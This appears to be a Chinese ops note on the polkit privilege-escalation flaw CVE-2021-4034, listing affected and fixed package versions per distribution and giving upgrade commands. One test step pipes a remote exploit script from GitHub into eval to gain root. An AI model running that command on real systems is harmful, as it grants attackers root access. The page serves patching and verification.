Linux polkit本地权限提升漏洞(CVE-2021-4034)

github POC 地址 (opens new window)

• centos 普通用户测试

centos7.9 默认polkit版本：polkit-0.112-26.el7.x86_64，需要升级到以上：polkit-0.112-26.el7_9.1.x86_64

useradd test
su - test
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
ls /root

• 受影响版本

    · 2009年5月至今发布的所有 Polkit 版本 注：Polkit预装在CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等多个Linux发行版上，所有存在Polkit的Linux系统均受影响。
  

• 修复的版本

    CentOS系列：
    CentOS 6：polkit-0.96-11.el6_10.2
    CentOS 7：polkit-0.112-26.el7_9.1
    CentOS 8.0：polkit-0.115-13.el8_5.1
    CentOS 8.2：polkit-0.115-11.el8_2.2
    CentOS 8.4：polkit-0.115-11.el8_4.2
    
    Ubuntu系列：
    Ubuntu 21.10：policykit-1-0.105-31ubuntu0.1
    Ubuntu 20.04 LTS：policykit-1 - 0.105-26ubuntu1.2
    Ubuntu 18.04 LTS：policykit-1 - 0.105-20ubuntu0.18.04.6
    Ubuntu 16.04 ESM：policykit-1 - 0.105-14.1ubuntu0.5+esm1
    Ubuntu 14.04 ESM：policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
    
    Debain系列：
    Debain stretch：policykit-1 0.105-18+deb9u2
    Debain buster：policykit-1 0.105-25+deb10u1
    Debain bullseye：policykit-1 0.105-31+deb11u1
    Debain bookworm,bullseye：policykit-1 0.105-31.1
  
    麒麟v10
    漏洞修复版本：0.116-6.ky10 # devel,help,libs 总共四个包
  

修复

• CentOS:

yum clean all && yum makecache #需要配置base源
yum update polkit -y

wget https://download.yfklife.cn/blog/ops/security/polkit-0.112-26.el7_9.1.x86_64.rpm

• Ubuntu:

sudo apt-get update #需要配置base源
sudo apt-get install policykit-1